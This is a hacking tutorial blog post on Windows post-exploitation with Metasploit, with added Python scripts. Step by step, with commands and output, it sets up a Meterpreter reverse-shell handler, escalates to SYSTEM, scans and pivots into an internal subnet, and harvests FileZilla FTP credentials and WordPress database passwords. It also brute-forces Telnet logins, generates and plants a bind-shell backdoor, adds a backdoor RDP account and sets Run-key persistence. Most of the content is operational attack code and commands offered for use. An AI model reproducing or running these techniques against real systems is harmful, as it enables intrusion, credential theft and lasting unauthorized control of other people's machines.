Post Exploitation Hacking Techniques

By: Chilico
June 15, 2016
Hello there,

This is my first 0P3N submission, and we'll talk about post-exploitation techniques you can use once you have a Meterpreter shell on a remote system. You'll see things like:
  1. Privilege Escalation
  2. Maintaining Access
  3. Data Harvesting
  4. Weak Password Cracking
NOTE: Don't take this guide as a standard methodology. The purpose is to show different "tips and tricks" you can use in the post-exploitation phase.

Start the Handler

We're assuming a backdoor (a windows/meterpreter/reverse_tcp payload) is already installed on the remote system and calls back to our machine on 172.16.5.40:4466. Let's get the handler running and waiting for that connection:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.5.40
LHOST => 172.16.5.40
msf exploit(handler) > set LPORT 4466
LPORT => 4466
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.5.40:4466
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 10.32.120.15
[*] Meterpreter session 1 opened (172.16.5.40:4466 -> 10.32.120.15:1034)

Privilege Escalation

Now that we have a session, let's get higher privileges on the system. getsystem tries several local techniques in turn (named-pipe impersonation and token duplication) and reports which one worked:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Map the Network

An easy way to map the internal network is to run the arp_scanner Meterpreter script against the compromised host's own subnet. ARP only reaches the local broadcast domain, but within it the scan finds hosts regardless of host firewalls, since they have to answer ARP to talk at all:

meterpreter > run arp_scanner -r 10.32.120.0/24
[*] ARP Scanning 10.32.120.0/24
[*] IP: 10.32.120.1 MAC 00:50:56:b1:eb:b8
[*] IP: 10.32.120.8 MAC 00:50:56:b1:eb:9a
[*] IP: 10.32.120.15 MAC 00:50:56:b1:eb:dd
[*] IP: 10.32.120.17 MAC 00:50:56:b1:eb:de
[*] IP: 10.32.120.13 MAC 00:50:56:b1:eb:df
meterpreter >

As you can see, there are 5 hosts on the segment in total (10.32.120.15 is the one we're already on).

Port Scan

Once we've listed the internal hosts, we run a TCP scan to check for open ports. The open ports also help us identify the role of each system inside the network. To do that, we first background the current session and run the auxiliary/scanner/portscan/tcp module from msfconsole. Here it is pointed at a single host; RHOSTS also accepts a range or a CIDR block if you want to sweep all of them:

meterpreter > background
[*] Backgrounding session 4...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.32.120.17
RHOSTS => 10.32.120.17
msf auxiliary(tcp) > run
[*] 10.32.120.17:139 - TCP OPEN
[*] 10.32.120.17:135 - TCP OPEN
[*] 10.32.120.17:445 - TCP OPEN

Data Harvesting

There's a whole family of post/windows/gather modules for this purpose; we'll see a few of them.

First, find out which applications are installed:

meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on LS-WINXP

Installed Applications
======================

Name                                              Version
----                                              -------
FileZilla Client 3.5.3                            3.5.3
Microsoft Visual C++ 2008 Redistributable - x86   9.0.30729.4148
Microsoft Visual C++ 2010 x86 Redistributable     10.0.40219
Security Update for Windows XP (KB958644)         1
VMware Tools                                      8.6.0.6261
WebFldrs XP                                       9.50.7523

[*] Results stored in: /root/.msf4/loot/20120314093539_default_10.32.120.15_host.application_729568.txt
meterpreter >

We find FileZilla running on the system, and Metasploit has a module that pulls saved credentials out of FileZilla's sitemanager.xml and recentservers.xml. FileZilla keeps those files under the user's Application Data folder, and clients of this vintage store the passwords in plaintext (later versions only base64-encode them unless a master password is configured), so they come straight out:

meterpreter > run post/multi/gather/filezilla_client_cred
[*] Checking for Filezilla directory in: C:\Documents and Settings\LSAdmin\Application Data
[*] Found C:\Documents and Settings\LSAdmin\Application Data\FileZilla
[*] Checking for Filezilla directory in: C:\Documents and Settings\Administrator\Application Data
[*] Reading sitemanager.xml and recentservers.xml files from C:\Documents and Settings\LSAdmin\Application Data\FileZilla
[*] Parsing sitemanager.xml
[*]     Collected the following credentials:
[*]     Server: 10.32.121.23:21
[*]     Protocol: FTP
[*]     Username: lsuser_ftp
[*]     Password: FTPStrongPwd
[*] Parsing recentservers.xml
[*]     Collected the following credentials:
[*]     Server: 10.32.121.23:21
[*]     Protocol: FTP
[*]     Username: lsuser_ftp
[*]     Password: FTPStrongPwd
meterpreter >
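What filezilla_client_cred does under the hood is parse two small XML files, and it's useful to be able to do that yourself when you've pulled the files off a host with meterpreter's download rather than running the module. The parser below is an added example, not the module's code and not from the original post. Its embedded document is constructed: it mirrors the entry the module found above and adds an SFTP entry with a base64-encoded password and an anonymous entry, the cases a parser has to handle. The Protocol numbering follows FileZilla's ServerProtocol enum as I know it (0 FTP, 1 SFTP, 3 FTPS, 4 FTPES); anything else is reported raw.

```python
import base64
import sys
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml-style document (not the file from the target).
# Entry 1 mirrors the post; entries 2 and 3 are invented to show a base64
# password and an anonymous login.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.5.3" platform="windows">
  <Servers>
    <Server>
      <Host>10.32.121.23</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>lsuser_ftp</User>
      <Pass>FTPStrongPwd</Pass>
      <Logontype>1</Logontype>
      <Name>intranet ftp</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">cyZjcjN0IQ==</Pass>
      <Logontype>1</Logontype>
      <Name>build box</Name>
    </Server>
    <Server>
      <Host>anon.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>0</Logontype>
      <Name>anonymous mirror</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# FileZilla ServerProtocol values as I know them; others are reported raw.
PROTOCOLS = {"0": "FTP", "1": "SFTP", "3": "FTPS", "4": "FTPES"}


def decode_pass(pass_el):
    """Return the stored password, or None if absent or not recoverable offline."""
    if pass_el is None or not (pass_el.text or "").strip():
        return None
    text = pass_el.text.strip()
    enc = pass_el.get("encoding")
    if enc is None:           # 3.5-era clients: plaintext
        return text
    if enc == "base64":       # later clients without a master password
        return base64.b64decode(text).decode("utf-8", "replace")
    return None               # e.g. encoding="crypt": master-password protected


def parse_filezilla(xml_text):
    """One record per <Server>. sitemanager.xml wraps them in <Servers> and
    recentservers.xml in <RecentServers>; iter() over <Server> handles both."""
    root = ET.fromstring(xml_text)
    creds = []
    for srv in root.iter("Server"):
        def field(name):
            return (srv.findtext(name) or "").strip()
        proto = field("Protocol")
        creds.append({
            "name": field("Name"),
            "host": field("Host"),
            "port": int(field("Port") or 0),
            "protocol": PROTOCOLS.get(proto, "protocol %s" % proto),
            "user": field("User") or None,
            "password": decode_pass(srv.find("Pass")),
            "anonymous": field("Logontype") == "0",   # Logontype 0 = anonymous
        })
    return creds


def main(paths):
    # Where the files live once downloaded from a host:
    #   %APPDATA%\FileZilla\sitemanager.xml and recentservers.xml
    #   (C:\Documents and Settings\<user>\Application Data\FileZilla on XP)
    for path in paths:
        with open(path, encoding="utf-8") as fh:
            for c in parse_filezilla(fh.read()):
                print("%(protocol)s %(host)s:%(port)d %(user)s %(password)s  [%(name)s]" % c)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        main(sys.argv[1:])
    else:
        for c in parse_filezilla(SAMPLE_SITEMANAGER):
            print(c)
```

A password that comes back as None with an encoding attribute present means the profile is protected by a FileZilla master password; that has to be recovered separately and is out of scope here.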

We also found a new host, 10.32.121.23, on a different subnet, with an FTP service and a valid account for it.

Exploit the Server

Before digging into 10.32.121.23, let's give ourselves a more comfortable foothold on the box we already own (10.32.120.15) by creating a local user, adding it to the Remote Desktop Users group and enabling RDP. We do that from a command shell inside the running Meterpreter session, then use the getgui script to switch the Terminal Services service on. (getgui can also create the user and add it to the group itself with -u and -p. Either way, net user leaves an account-creation event in the Security log and a new profile on disk, which is exactly the kind of artifact incident responders look for, so keep the cleanup .rc file that getgui writes.)

meterpreter > shell
Process 1100 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\LSAdmin> net user guest_1 guestpwd /add
net user guest_1 guestpwd /add

C:\Documents and Settings\LSAdmin> net localgroup "Remote Desktop Users" guest_1 /add
net localgroup "Remote Desktop Users" guest_1 /add
The command completed successfully.

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it...
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20120314.4155.rc
meterpreter >

We can then log in to it with:

root@kali:~# rdesktop 10.32.120.15 -u guest_1

Once the RDP session connects, you'll be prompted for the password (guestpwd).

Port Scan

Let's run a TCP scan on the new server to check for open ports. 10.32.121.23 is on a subnet the attacker machine can't reach directly, so we first add a route through the session on victim 1. This only touches Metasploit's own routing table: framework modules will send traffic for 10.32.121.0/24 through that Meterpreter session instead of the local network stack, so victim 1 acts as our bridge.

meterpreter > run autoroute -s 10.32.121.0/24
[*] Adding a route to 10.32.121.0/255.255.255.0...
[+] Added route to 10.32.121.0/255.255.255.0 via 10.32.120.15
[*] Use the -p option to list all active routes
meterpreter >

Now, we can run our scanner module:

meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.32.121.23
RHOSTS => 10.32.121.23
msf auxiliary(tcp) > run
[*] 10.32.121.23:21 - TCP OPEN
[*] 10.32.121.23:23 - TCP OPEN
[*] 10.32.121.23:80 - TCP OPEN
[*] 10.32.121.23:139 - TCP OPEN
[*] 10.32.121.23:135 - TCP OPEN
[*] 10.32.121.23:445 - TCP OPEN
...

Web Server

The scan shows a web server on the intranet host. The route we added is known only to Metasploit, so a browser on the attacker box still can't reach 10.32.121.23; instead we create a port forward, which opens a local listening port and relays each connection through the Meterpreter session to port 80 on the server:

meterpreter > portfwd add -l 8001 -p 80 -r 10.32.121.23
[*] Local TCP relay created: 0.0.0.0:8001 <-> 10.32.121.23:80
meterpreter >
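To make the mechanics of that relay concrete, here is a plain TCP port forwarder in Python, written for this page as an added example; it is not Meterpreter's portfwd implementation and not from the original post. It accepts connections on a local port, opens a connection to the remote host and port for each one, and copies bytes in both directions until either side closes. The demo server bundled with it is a constructed stand-in for the intranet site on 10.32.121.23:80 so the relay can be exercised offline; it answers every request with a fixed HTTP response.

```python
import socket
import sys
import threading
import time


def _pump(src, dst):
    """Copy bytes one way until src reaches EOF, then half-close dst so the
    far end sees the EOF too. The reverse direction runs in another thread."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, remote_addr):
    """Service one accepted connection: dial the remote side and pump both ways."""
    try:
        remote = socket.create_connection(remote_addr, timeout=10)
    except OSError:
        client.close()          # remote unreachable: drop the client
        return
    remote.settimeout(None)
    back = threading.Thread(target=_pump, args=(remote, client), daemon=True)
    back.start()
    _pump(client, remote)
    back.join()
    client.close()
    remote.close()


def start_relay(listen_port, remote_host, remote_port, listen_host="127.0.0.1"):
    """Listen on listen_host:listen_port and relay each connection to
    remote_host:remote_port. Returns the listening socket (use getsockname()
    to learn the port when listen_port is 0). Defaults to the loopback
    address, unlike the 0.0.0.0 listener in the Meterpreter transcript."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return          # listener closed
            threading.Thread(target=_handle, args=(client, (remote_host, remote_port)),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def start_demo_server(body=b"intranet"):
    """Constructed stand-in for the internal web server: reads one request and
    answers with a fixed HTTP/1.0 response, then closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.recv(4096)   # request contents are not inspected
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (len(body), body))

    threading.Thread(target=serve, daemon=True).start()
    return srv


def fetch_through(relay_port):
    """Issue a GET through the relay and return the raw response bytes."""
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: intranet\r\n\r\n")
        chunks = []
        while True:
            d = s.recv(4096)
            if not d:
                break
            chunks.append(d)
    return b"".join(chunks)


if __name__ == "__main__":
    # e.g. python relay.py 10.32.121.23 80  then browse http://127.0.0.1:8001/
    start_relay(8001, sys.argv[1], int(sys.argv[2]))
    while True:
        time.sleep(60)
```

The difference from Meterpreter's portfwd is where the remote leg originates: portfwd carries it over the Meterpreter channel, so the target sees the connection coming from 10.32.120.15, whereas this script dials the remote host directly and would have to run on a machine that can reach it. Binding to 127.0.0.1 by default matters too: the transcript's relay on 0.0.0.0:8001 hands the intranet site to anyone who can reach the attacker box.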

We should now be able to access the internal web site by visiting http://localhost:8001/. Note that the relay listens on 0.0.0.0, so anyone who can reach port 8001 on the attacker box gets the same access; use portfwd's -L option to bind it to 127.0.0.1 if that matters.

Weak Password Cracking

In the earlier scan we also found port 23 open on 10.32.121.23. Even without service detection, that's almost certainly a Telnet service. Let's try to guess the password with the telnet_login auxiliary module, feeding it a username list and a password list. STOP_ON_SUCCESS makes it stop at the first valid pair. Two things to keep in mind on a Windows host: a local or domain lockout policy will lock the account long before a 10,000-entry list is exhausted, so keep the lists short and the thread count modest, and Telnet sends everything in the clear, so every attempt is trivially visible on the wire.

msf auxiliary(tcp) > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set RHOSTS 10.32.121.23
RHOSTS => 10.32.121.23
msf auxiliary(telnet_login) > set PASS_FILE /root/Desktop/pwd.txt
PASS_FILE => /root/Desktop/pwd.txt
msf auxiliary(telnet_login) > set USER_FILE /root/Desktop/username.txt
USER_FILE => /root/Desktop/username.txt
msf auxiliary(telnet_login) > set THREADS 15
THREADS => 15
msf auxiliary(telnet_login) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(telnet_login) > exploit
...
[*] 10.32.121.23:23 TELNET - [00009/10000] - Banner: Welcome to Microsoft Telnet Service login:
[*] 10.32.121.23:23 TELNET - [00009/10000] - Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET - [00009/10000] - Result: The handle is invalid. Login Failed login:
[*] 10.32.121.23:23 Telnet - [00010/10000] - Attempting: 'netadmin':'12345678'
[*] 10.32.121.23:23 TELNET - [00010/10000] - Banner: Welcome to Microsoft Telnet Service login:
[*] 10.32.121.23:23 TELNET - [00010/10000] - Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET - [00010/10000] - Result: The handle is invalid. Login Failed login:
[*] 10.32.121.23:23 Telnet - [00011/10000] - Attempting: 'netadmin':'abc123'
[*] 10.32.121.23:23 TELNET - [00011/10000] - Banner: Welcome to Microsoft Telnet Service login:
[*] 10.32.121.23:23 TELNET - [00011/10000] - Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET - [00011/10000] - Result: *=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\netadmin>
[+] 10.32.121.23 - SUCCESSFUL LOGIN netadmin : abc123
[*] Attempting to start session 10.32.121.23:23 with netadmin:abc123
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Auxiliary module execution completed
msf auxiliary(telnet_login) >

Uploading a Backdoor

Create a backdoor. The transcript below comes from the old msfpayload tool (the trailing X means "emit a Windows executable"), and the command line is msfpayload's syntax, not msfvenom's. On a current Metasploit install msfpayload is gone and the equivalent is:

msfvenom -p windows/meterpreter/bind_tcp LPORT=2444 -f exe -o /root/Desktop/msf_bind.exe

A bind payload is chosen because the server most likely has no route back to 172.16.5.40 for a reverse connection; with bind_tcp the handler connects to the server through the pivot instead.

root@kali:~# cd /pentest/exploits/framework3/
root@kali:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/bind_tcp LPORT=2444 X > /root/Desktop/msf_bind.exe
Created by msfpayload (https://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 298
Options: {"LPORT"=>"2444"}

Upload it to the remote system and execute it through the Telnet session (we have the credentials). Note that the transcript uploads the file into LSAdmin's Temp directory on victim 1 (the Meterpreter host) but runs it from C:\inetpub\ftproot on 10.32.121.23; the hop between the two isn't shown. The FTP account harvested from FileZilla points at that server, and its FTP root is where the file turns up, which is the obvious way it got there.

meterpreter > upload /root/Desktop/msf_bind.exe 'C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe'
[*] uploading  : /root/Desktop/msf_bind.exe -> C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
[*] uploaded   : /root/Desktop/msf_bind.exe -> C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
meterpreter >

Run the backdoor from the Telnet session:

msf auxiliary(telnet_login) > sessions -i 2
[*] Starting interaction with 2...

C:\>cd inetpub
cd inetpub

C:\inetpub>cd ftproot
cd ftproot

C:\inetpub\ftproot>msf_bind.exe
msf_bind.exe

C:\inetpub\ftproot>

Next, we set up a bind handler, which connects out to port 2444 on the server through the route we added earlier:

msf auxiliary(tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.32.121.23
RHOST => 10.32.121.23
msf exploit(handler) > set LPORT 2444
LPORT => 2444
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (752128 bytes)
[*] Meterpreter session 4 opened (172.16.5.40-10.32.120.15:0 -> 10.32.121.23:2444)
meterpreter >

Privilege Escalation

NOTE: Don't forget that the first thing you want to do after gaining access to a remote system is to escalate your privileges (after migrating into a more stable process, of course). Let's run it once more, on the new host:

meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Maintaining Access

Getting high privileges isn't enough, right? Let's add a value under the Run key in the registry so our backdoor starts at logon and we can get back onto the system any time we want. Two caveats: entries under HKLM\...\Run only fire when someone logs on interactively, and they run with that user's privileges rather than as SYSTEM, so a reboot of an unattended server won't bring the backdoor back (a service or scheduled task is the usual answer to that); and because this is a bind payload, port 2444 on the server must still be reachable through the pivot when you want to reconnect.

meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v msf_bind -d '"C:\inetpub\ftproot\msf_bind.exe"'
Successful set msf_bind.
meterpreter >

Where -k indicates the registry key path, -v the value name and -d the data to store in it (written as a REG_SZ string by default).

Data Harvesting

We know the system is running a web server, and it's probably backed by a database. Let's find the usernames and passwords for the site. The easiest way is to download the site's config file. The directory listing shows a WordPress install, so the file we want is wp-config.php, which holds the database credentials as PHP define() constants:

meterpreter > ls
Listing: C:\inetpub\wwwroot\intranet
====================================

Mode              Size   Type  Name
----              ----   ----  ----
40777/rwxrwxrwx   0      dir   .
40777/rwxrwxrwx   0      dir   ..
100666/rw-rw-rw-  397    fil   index.php
100666/rw-rw-rw-  16899  fil   licence.txt
100666/rw-rw-rw-  9202   fil   readme.html
...
100666/rw-rw-rw-  3982   fil   wp-comments-post.php
100666/rw-rw-rw-  3165   fil   wp-config.php
100666/rw-rw-rw-  0      dir   wp-content
...

meterpreter > download wp-config.php /root/Desktop/conf.php
[*] downloading: wp-config.php -> /root/Desktop/conf.php/wp-config.php
[*] downloaded : wp-config.php -> /root/Desktop/conf.php/wp-config.php
meterpreter >

And, finally, in that file, the credentials we need (download treated /root/Desktop/conf.php as a directory name, so the file actually landed at /root/Desktop/conf.php/wp-config.php):

DB_NAME        intranet
DB_USER        root
DB_PASSWORD    LSMySqlDBPwd0905
DB_HOST        10.32.121.12

Note that DB_HOST is yet another machine, 10.32.121.12, and the site connects to it as root, so these credentials are the next pivot rather than the end of the chain.
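Reading those four values off the screen works once; on a real engagement you'll pull wp-config.php from several sites and want the extraction done the same way each time. The script below is an added example for this page, not from the original post or from WordPress, and its embedded wp-config.php fragment is constructed around the values reported above (the FTP_PASS line is invented to show a value containing an escaped quote). It parses the quoted define() constants, splits DB_HOST the way WordPress does (host, host:port, or host:/path/to/socket), builds a mysql client command that keeps the password off the command line, and flags any authentication keys still set to the wp-config-sample.php placeholder.

```python
import re
import sys

# Constructed wp-config.php fragment modelled on the values the page reports
# (this is not the file downloaded from 10.32.121.23). FTP_PASS is invented
# to show a value with a backslash-escaped quote.
SAMPLE_WP_CONFIG = r"""<?php
/** The name of the database for WordPress */
define('DB_NAME', 'intranet');
define("DB_USER", "root");
define( 'DB_PASSWORD', 'LSMySqlDBPwd0905' );
define('DB_HOST', '10.32.121.12');
define('DB_CHARSET', 'utf8');
define('AUTH_KEY', 'put your unique phrase here');
define('FTP_PASS', 'ab\'cd');
$table_prefix  = 'wp_';
define('WP_DEBUG', false);
"""

# define('KEY', 'value'); with either quote style, optional whitespace, and
# backslash-escaped quotes inside the value. Unquoted values (booleans,
# numbers) are deliberately not matched.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<key>[A-Za-z0-9_]+)\1\s*,\s*(['"])(?P<val>(?:\\.|(?!\3).)*)\3\s*\)\s*;"""
)
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*(['"])(?P<val>[^'"]*)\1\s*;""")

PLACEHOLDER = "put your unique phrase here"   # wp-config-sample.php default
SECRET_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
               "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")


def parse_wp_config(text):
    """Return {constant: value} for every quoted define(), plus table_prefix."""
    cfg = {}
    for m in DEFINE_RE.finditer(text):
        # drop the backslash from \' and \\ (PHP single-quote escapes)
        cfg[m.group("key")] = re.sub(r"\\(.)", r"\1", m.group("val"))
    m = PREFIX_RE.search(text)
    if m:
        cfg["table_prefix"] = m.group("val")
    return cfg


def db_credentials(cfg):
    """Split DB_HOST the way WordPress does: 'host', 'host:port' or
    'host:/path/to/socket'. MySQL's default port is 3306."""
    host, _, rest = cfg.get("DB_HOST", "localhost").partition(":")
    return {
        "host": host,
        "port": int(rest) if rest.isdigit() else 3306,
        "socket": rest if rest and not rest.isdigit() else None,
        "user": cfg.get("DB_USER"),
        "password": cfg.get("DB_PASSWORD"),
        "database": cfg.get("DB_NAME"),
    }


def mysql_command(creds):
    """Client invocation to try the credentials. The password is left off the
    command line on purpose: a bare -p prompts for it, keeping it out of shell
    history and 'ps' output on the attacker box."""
    return "mysql -h {host} -P {port} -u {user} -p {database}".format(**creds)


def weak_secrets(cfg):
    """Auth keys/salts still set to the sample placeholder, i.e. never rotated."""
    return [k for k in SECRET_KEYS if cfg.get(k) == PLACEHOLDER]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_WP_CONFIG
    cfg = parse_wp_config(text)
    creds = db_credentials(cfg)
    for k in ("database", "user", "password", "host", "port"):
        print("%-9s %s" % (k, creds[k]))
    print(mysql_command(creds))
    if weak_secrets(cfg):
        print("placeholder secrets:", ", ".join(weak_secrets(cfg)))
```

Placeholder AUTH_KEY and salt values are worth reporting alongside the database credentials: WordPress signs its login cookies with them, and a site still running on the sample values has never been properly configured.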

That's it for now, folks. Hope you find this useful!